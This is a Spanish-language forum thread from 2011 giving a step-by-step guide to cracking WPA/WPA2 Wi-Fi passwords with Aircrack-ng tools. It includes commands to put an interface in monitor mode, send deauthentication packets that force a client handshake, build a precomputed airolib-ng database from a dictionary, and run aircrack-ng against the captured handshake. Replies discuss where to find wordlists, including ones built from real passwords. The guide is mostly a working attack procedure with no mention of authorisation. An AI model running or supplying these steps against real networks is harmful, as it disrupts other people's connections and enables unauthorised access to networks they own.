Airolib-ng (El "Rapido" Crackeo de WPA/WPA2)

Iniciado por KzZiIi3l, Diciembre 06, 2011, 04:18:00 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Diciembre 06, 2011, 04:18:00 PM Ultima modificación: Diciembre 10, 2011, 02:37:01 PM por KzZiIi3l
- Hola! Soy nuevo aqui en esta comunidad y este metodo talvez algunos ya lo conoscan, pero estoy seguro qe un poco mas de la mitad no lo conocen; no me gustar repostear cosas qe ya se encuentran en un foro, por eso mismo revise los posts si estaba posteado ó no y por lo visto no habia nada sobre esto  ;D , porsiacaso este articulo yo lo habia posteado antes en DDLR pero lo he modificado un poco y tambien qe esto lo sabia desde BT 3 ó 4, lo qiero recalcar!..

Bueno en fin explico:
-  Esta es otra manera de crackear los Handshake de los Access Point con encryptacion WPA/WPA2 con la tool Airolib-ng , qe se encuentra en el suite de Aircrack-ng ya hace tiempo..; esto tambien se realiza con la ayuda de un buen diccionario!

... La diferencia con el "Proceso Normal" del Crackeo WPA/WPA2, es que crea una Base de Datos y se podria decir qe hace un ataque Pre-computeado apresurando el proceso de busqueda de la contraseña agrupando las palabras de la BD de tal manera dada al handshake, demorandonos asi mucho menos en crackearla, pero ante todo la contraseña se supone qe debe estar el diccionario importado xDD!!, SOLO QE TARDA MUCHO MENOS EN ENCONTRARLA.




Empezamos con los comandos tipicos: (solo ejemplos y bla bla..)

Código: php

airmon-ng start (interfaz)
airodump-ng mon0 [ó si quieren hacen la busqueda más especializada]
airodump-ng -w _ -c _ --bssid _ mon0


___________
*Abrimos otra Terminal:

Código: php

aireplay-ng -0 5 -a _ -c _  mon0



....Esperamos handshake (si no intentanos denuevo el comando)
... y listo
... [Lo importante es obtener el preciado handshake]
si quieren cierran la Terminal.

En la ventana del airodump-ng la frenamos (Con CONTROL+C) y haora ha lo qe vamos...

Airolib-ng

Código: php

airolib-ng crackwpa (ó cualqier otro nombre) --import passwd (Ruta del diccionario) # Importamos el Diccionario.
nano (ó cualqier otro editor) essid (escribimos el essid de la red, guardamos y cerramos) # Creamos el texto ESSID.
airolib-ng crackwpa --import essid (Ruta del archivo "essid" creado con kate anteriormente) # Importamos la ESSID.
airolib-ng crackwpa --clean all # Limpiamos.
airolib-ng crackwpa --stats # Vemos lo qe hay.
airolib-ng crackwpa --batch # Computeamos el ataque.
airolib-ng crackwpa --verify all # y verificamos todo...
clear ... xDD



___________(Ya qe esta todo listo.. ordenado y limpio :D, procedemos al Crackeo en sí)

aircrack-ng -r crackwpa (nombre del archivo).cap


Y talvez con suerte un...

KEY FOUND! [--:--:--:--:--:--:--:--:--:--:--] (ASCII:--------- ) [& nos sentimos realizados por unos segundos...]

Gracias!! Espero qe les sirva de utilidad... Saludos!

...::Fin::...

Muchas gracias por la iformacion, muy interesante, lo probare y comprobare a ver que tal, saludos

Gracias ha ti por comentar! Intentalo y veras como funciona man ;)!

Pues muchas gracias, pero me podrias decir de donde agarro un buen diccionario, por la red hay muchos y he probado bastande de diferentes tamaños sin ningun resultado.   y yo creo que mintras no salga algun otro metodo no es mas que un juego de azar, en donde puede o no estar el pass de la wpa o wpa2, de todos modos te agradeceria si proporcionaras un dicionario, gracias.

OK, thanks ... Ps, bueno aca No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hay unas muy buenas recopilaciones... en tener una wordlist buena recomiendo qe tambien existan con claves reales, no solo palabras, numeros, letras, digitos especiales etc.. porqe tambien va siempre en la logica de la persona qe haga la clave; Aunqe de lo contrario tenga una pass autoconfigurada por el mismo router la marca ó el ISP, por eso mismo caen bien las recopilaciones grandes :D Ten encuenta qe es fuerza bruta con diccionarios, como tu mismo dijiste man "no es mas que un juego de azar", en parte vale algo asi jajaj 1x1.... Todo esto lleva una gran dificultad tediosa de obtener el password.-.

Muchas gracias, parece que hay mucho de donde escoger, intentare, despues comento como me fue.

Se ve muy bueno, voy a hacer un estudio sobre este metodo
Muy buen aporte!


Vale!.. esto me estima ha subir post mas pioneros :D o algo asi  ??? JAJA... XD